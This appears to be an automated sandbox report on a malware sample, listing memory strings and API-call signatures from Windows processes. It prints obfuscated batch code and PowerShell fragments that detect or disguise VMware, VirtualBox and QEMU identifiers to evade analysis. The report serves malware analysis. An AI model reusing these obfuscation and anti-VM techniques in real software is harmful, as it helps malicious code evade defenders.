lbzIuqBsgyDNybymb%e%vfwGtPChaYaDgwUwveHbpnidaPcmQOZKJStojFIKfnqDrCrh%%bFuFZvhXsFDNqqmZpUodFmQwWWbXFLxyUtPiFfKxlrRZeXPXeDcIcdnPP%x%IctjrGifSXBdtjjRRnuQsZgeTbJPvQgZtHxHdcZkRYeSwbkSylmZuYFIWoqqWt%%bQBJMMBNPnjYtVoISRRqkEgFubOLOLJoyocbUrxfXxw
LkamN%p%GyzfczxKWpKYQYdEVAfSmNAtLtNiuuuPadinkjvOFrYbN%%gyshozgVvSXftJMopB%a%UXMQQuMfqmVPzGEmoPnfUIfIpqeQLcqcwhSkuIBNCuQIzdyzPxxybwZlSdA%%qVtoVTsrNuRGoACASwjmREbnESaahHrqhbxGa%n%MGKgMvGRkBTztvUoILUgKdSskgcAymdWzqJCBLS%%HMHyhHoWwTsLLURJOsVFsfsYyXZcMsMWSoyXwtkDSge%s%TrkEyaOiQnnBuIajHlkegwTxwUmuhsNmbNehNuELEE%%FbWCNtaVGWayxxMi%i%NtayzaAGETwmHyzCqovzrzbgwhqapHJamaYkDHgav%%jzEIYxAWhjqJlosTbsJzrXkwaHApYIhvdvqBCOiTAtAzJCOJSKGOqWEmphHr%o%lXzbVFPXQqnjQZYwLNySQwobtehRemugQVpvbxNWYMbttEzWFPEujyhOJxIRyY%%EWgsVKDvnZBUevUIPEklpIaXrOALDPWyaSxxnlEmctqvIEdtOOSmnMEVVi%n%gjRSyccTlXx%
Source: $rbx-CO2.bat.12.drBinary or memory string: !BYarQcOfuEgOwbePEByPiELbMcxcMCvfLACRyOEQXJGNbtMghEzExriXnYFNELtRibdWznrQWISyXYas! "C%vDkunAhkxtpfXsVEAEezopSuOnXnLnLYrMDzYSWQxyPXnjpeZdCZgpAfLQGZCTzkHrOlOwGHHo%Z%cQAUgEYSoHKLSclxOhmXnDYEpVvepCxUrRnJFQJbbKERzVzLZrIyvKaySVEljUCLkQuaOBSXyk%d%VDYhfuvJeYUZzHQORJlyShhSHJBzWxyKakOxzKQkPzPERlqMjaKjLasOvgAwTWMGzjZoStphSb%j%IsrCbwsOpWNpZZRZctkurSMieHlcUQKCqKraxSeedeHPTkkZwSrVXyKPFiyukqTymkYpHRCjof%m%qmlXpUwmFbzPFRZCvouKUNkiDImVrFqhGRixEITEXXKSZwFgpfwnOElCbctHHBVaLriOJCYMvQ%j%MWdsjgdfFlicscFGwBplWwcJhHoQxNhJSYSpyJSmDCVJRIZgjdfwxjTpUtkCSmISezkujqhNIc%q%IuBtSzHiHtHKlIeCveyqurTcEsxFWTVsNvBzOBBLUJFoktnBpHUcosIqAyOAbcmOyoWQhENTDM%E%vLMFRleWpoYTdvMkZpNbKSwQQVwwuKTbyCXXEVGCvfMXQElBeWFygCbDoVOVOHBFvXuByPGeIk%J%FFfyalKVsyfvUWAtIIgLNODhCTkJdopBPWWwxPVDlTocAZdxaegXYXwRbYWhbaRdiEFXaeWTNC%m%AUzAGCQMJYirCRAfuzTNBkbkUWufxWhnkvxCsBrtrorTVQbOxVJxZZaqSoGKiKpMQUhhuYMThA%q%wmSipdVGICmKnkuhJeUGkGZFcbJTtziQpzCOxJZDPCcMAgGXMmoIYApQnngotbmjuwvOHGJZfq%D%RIEneVuMhgkzROkMAkDLjOqTseLSpgDoDIJGlZikTHTfYVEGDUfzwtgdsLUakBwbDWVjfDBBbs%p%RCUkUxzeouadRjBGoAfhZskSBcZuAatEyeCEihQxAgmcaAeLIzpawTsysbJSxeDobwFNHXxhJH%n%GTfiSbXoMbLsiELdmgxXavCYaEVqeLbhqOmytjjIUisCDInacDKqJLHkrhhofHkbaDctrmKcXP%w%dRdausqUoAaKyEhbhmcVCnYqCZGUJPTItTIPhrMOXlsJbpfxmpfxZbnPTMyvMwlyHrrEWrUPAn%U%XrUopmUjHtKvJrGTWuTrcBaUcJYAAUupXLdWUFwlADOROlIZXdvAWjlwqalFouIMZuyXoKYqXI%I%QzMjgQbZCxzUtOAHFUtRWgUcRtNKLneeCnsLKhUuEpRkneaKxGfeXgLKEKrMdrnptusfvOXxZY%d%mHoKPNsdneiagvCHhaQhrmbCQSMVoIJHeYTdvUUDuadjgtnWDOHWHSHZFMTWbxPFuAVhCymnfm%E%NrjSvxEPrAbMamrTxIaYCXkyOGxgueBuRuepQNrwslfoDHAJQIaDmhJQgKdOayvnYHVFhcdKrE%k%FrRWUgfOpLdYhKLoifKCvUPSqWMUBNFqmIBsYkQWIliJjazkUTTXZOiLBZFXtlmCgNLyjspYpN%O%UkLgIqxCaITHqyAPQZESCxZFCvobbBDVIlUYZvqpARkEIzwnYtBqtwlwkfDmcvAyfYZeECQvIp%=*%KmvXdZacIamBlaxNTRdneqMzJAsJwCfHefAjPiAnbsSySxNdgOWEEbmtAWnD%s%GqGfUFwgAoXLrPlLyoGlMoDHGBccSgJTUWGKMNEnbGDSQlmPQAVmpcQsNZzs%*%CtouEeQuiAZLJtkfLKQupnmrkwESfoWNolKHsinMvRGpBkCVRLHdiedohXjh%t%zXpUDmxyICMCwdZxHWPaUJauGTEjiwAvZfnxCLLoMempYfGefGHkhinQ
WUnJ%*%InpmbrDqQBUVlBnPwLwBnzeCPqoQSwAHybGzOZnHCpoDLLZFUxtlyMwijNxL%e%cMytamxjUOawyPZYlAQdrIVudpjLFypbCCEPQUCyoQLfwWNJMyWIWutuRdqL%*%dLDvzZUVkjhqXsOBWPYgBzYgBGfiijYNEQvDmpGxcRyDrFKEFRxbfkkDMwUS%m%TLMbltMhWlpHjAdJbvPVVACrMWIuGRRPvNDrfxrXTDHuCQSEgACqGYWtivoo%*%LsAetzlvXMEDeScsTiOWedngpAixRkiJiclAdCadExHuVYmOVEzaHskIftPT%.%qNEMEVubGCoqiLrHwTlrouCmKicQSDvKNhNRSUPZDkitpiRWaCmlhxEWlrbw%*%SEicgEDaXAOBdlOdljWCqgPprjCpCQFBSthYcgmLEQYAOKiVJALcuzfMOSLW%I%bnygUmIJePbeWlXzipBGbGGcfDhtnukjvpJrsRFBcyRTyGfiBGEyreVvGwbr%*%fpwJESJGBGgqKaECPNDzxYRGQMSquoKWQovMcipGWzHVAnOqzsFTTBThxPSS%O%atmnVkAvERAHxWDYrVgDXBQbIRdpunpnpwGDmtapMsMHSYvWXVQBIoUzClEe%"
Source: lsass.exe, 0000000A.00000000.1990610706.00000202C0351000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
Source: svchost.exe, 0000001A.00000000.2100879086.000001D558DE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.26.drBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 0000002D.00000000.2187357921.000002644A62B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001A.00000002.2302118940.000001D558643000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmcitpA
Source: svchost.exe, 0000000B.00000000.1995514568.000002A66066C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000023.00000000.2146564984.0000023FD3802000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 0000000A.00000002.2300143860.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
Source: cmd.exe, 0000000F.00000003.2061101225.000002512A76B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QxAgmcaAeLIzpawTsysbJSxeDobwFNHXxhJH%n%GTfiSbXoMbLsiELdmgxXavCYaEVqeLbhqOmytjjIUisCDInacDKqJLHkrhhofHkbaDctrmKcXP%w%dRdausqUoAaKyEhbhmcVCnYqCZGUJPTItTIPhrMOXlsJbpfxmpfxZbnPTMyvMwlyHrrEWrUPAn%U%XrUopmUjHtKvJrGTWuTrcBaUcJYAAUupXLdWUFwlADOROlIZXdvAWjlwqalFouIMZuyXoKYqXI%I%QzMjgQbZCxzUtOAHFUtRWgUcRtNKLneeCnsLKhUuEpRkneaKxGfeXgLKEKrMdrnptusfvOXxZY%d%mHoKPNsdneiagvCHhaQhrmbCQSMVoIJHeYTdvUUDuadjgtnWDOHWHSHZFMTWbxPFuAVhCymnfm%E%NrjSvxEPrAbMamrTxIaYCXkyOGxgueBuRuepQNrwslfoDHAJQIaDmhJQgKdOayvnYHVFhcdKrE%k%FrRWUgfOpLdYhKLoifKCvUPSqWMUBNFqmIBsYkQWIliJjazkUTTXZOiLBZFXtlmCgNLyjspYpN%O%UkLgIqxCaITHqyAPQZESCxZFCvobbBDVIlUYZvqpARkEIzwnYtBqtwlwkfDmcvAyfYZeECQvIp%=*%KmvXdZacIamBlaxNTRdneqMzJAsJwCfHefAjPiAnbsSySxNdgOWEEbmtAWnD%s%GqGfUFwgAoXLrPlLyoGlMoDHGBccSgJTUWGKMNEnbGDSQlmPQAVmpcQsNZzs%*%CtouEeQuiAZLJtkfLKQupnmrkwESfoWNolKHsinMvRGpBkCVRLHdiedohXjh%t%zXpUDmxyICMCwdZxHWPaUJauGTEjiwAvZfnxCLLoMempYfGefGHkhinQWUnJ%*%InpmbrDqQBUVlBnPwLwBnzeCPqoQSwAHybGzOZnHCpoDLLZFUxtlyMwijNxL%e%cMytamxjUOawyPZYlAQdrIVudpjLFypbCCEPQUCyoQLfwWNJMyWIWutuRdqL%*%dLDvzZUVkjhqXsOBWPYgBzYgBGfiijYNEQvDmpGxcRyDrFKEFRxbfkkDMwUS%m%TLMbltMhWlpHjAdJbvPVVACrMWIuGRRPvNDrfxrXTDHuCQSEgACqGYWtivoo%*%LsAetzlvXMEDeScsTiOWedngpAixRkiJiclAdCadExHuVYmOVEzaHskIftPT%.%qNEMEVubGCoqiLrHwTlrouCmKicQSDvKNhNRSUPZDkitpiRWaCmlhxEWlrbw%*%SEicgEDaXAOBdlOdljWCqgPprjCpCQFBSthYcgmLEQYAOKiVJALcuzfMOSLW%I%bnygUmIJePbeWlXzipBGbGGcfDhtnukjvpJrsRFBcyRTyGfiBGEyreVvGwbr%*%fpwJESJGBGgqKaECPNDzxYRGQMSquoKWQovMcipGWzHVAnOqzsFTTBThxPSS%O%atmnVkAvERAHxWDYrVgDXBQbIRdpunpnpwGDmtapMsMHSYvWXVQBIoUzClEe%"
Source: cmd.exe, 0000000F.00000003.2027664001.000002512A75D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" :
Source: svchost.exe, 0000001A.00000000.2118976319.000001D559C12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 0000000E.00000002.2338111026.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end node graph_8-616
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end node graph_8-702
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000225DC6484B0
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC641E3C LoadLibraryA,GetProcAddress,SleepEx,9_2_00000225DC641E3C
Source: C:\Windows\System32\dllhost.exeCode function: 8_2_0000000140001CF0 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,OpenProcess,K32EnumProcessModulesEx,ReadProcessMemory,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,RtlFreeHeap,8_2_0000000140001CF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC648814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00000225DC648814
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000225DC6484B0
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC64CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000225DC64CD80
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC678814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00000225DC678814
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000225DC6784B0
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC67CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000225DC67CD80
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00000225DC6A8814
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000225DC6A84B0
Source: C:\Windows\System32\winlogon.exeCode function: 9_2_00000225DC6ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000225DC6ACD80
Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000202C0AE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00000202C0AE84B0
Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000202C0AE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00000202C0AE8814
Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000202C0AECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00000202C0AECD80
Source: C:\Windows\System32\svchost.exeCode function: 11_2_000002A66130CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_000002A66130CD80
Source: C:\Windows\System32\svchost.exeCode function: 11_2_000002A661308814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_000002A661308814
Source: C:\Windows\System32\svchost.exeCode function: 11_2_000002A6613084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_000002A6613084B0
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAED9CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000002BAAED9CD80
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAED98814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_000002BAAED98814
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAED984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000002BAAED984B0
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE0CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000002BAAEE0CD80
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE08814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_000002BAAEE08814
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000002BAAEE084B0
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE6CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000002BAAEE6CD80
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE68814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_000002BAAEE68814
Source: C:\Windows\System32\dwm.exeCode function: 14_2_000002BAAEE684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_000002BAAEE684B0
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000002512A6E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000002512A6E8814
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000002512A6E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000002512A6E84B0
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000002512A6ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000002512A6ECD80
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BEB0A384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000001BEB0A384B0
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BEB0A38814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_000001BEB0A38814
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BEB0A3CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000001BEB0A3CD80
Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000026A879C84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_0000026A879C84B0
Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000026A879C8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_0000026A879C8814
Source: C:\Windows\System32\svchost.exeCode function: 20_2_0000026A879CCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_0000026A879CCD80
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00000179537ACD80
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00000179537A84B0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00000179537A8814
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00000179537DCD80
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00000179537D84B0
Source: C:\Windows\System32\svchost.exeCode function: 21_2_00000179537D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00000179537D8814
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002295D56CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000002295D56CD80
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002295D568814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_000002295D568814
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002295D5684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000002295D5684B0
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306E684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0000025306E684B0
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306E68814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0000025306E68814
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306E6CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0000025306E6CD80
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306EC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0000025306EC84B0
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306EC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0000025306EC8814
Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000025306ECCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0000025306ECCD80
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001845B3C8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_000001845B3C8814
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001845B3C84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_000001845B3C84B0
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001845B3CCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_000001845B3CCD80
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001ADECD484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_000001ADECD484B0
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001ADECD48814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_000001ADECD48814
Source: C:\Windows\System32\svchost.exe | Code function: 25_2_000001ADECD4CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_000001ADECD4CD80
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001D5590784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001D5590784B0
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001D559078814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_000001D559078814
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001D55907CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001D55907CD80
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001D5590A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001D5590A84B0
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001D5590A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_000001D5590A8814
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001D5590ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001D5590ACD80
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001D5590D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001D5590D84B0
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001D5590D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_000001D5590D8814
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001D5590DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000001D5590DCD80
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_00000241A9EA8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_00000241A9EA8814
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_00000241A9EACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00000241A9EACD80
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_00000241A9EA84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_00000241A9EA84B0
Source: C:\Windows\System32\svchost.exe | Code function: 30_2_000001CD73198814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_000001CD73198814
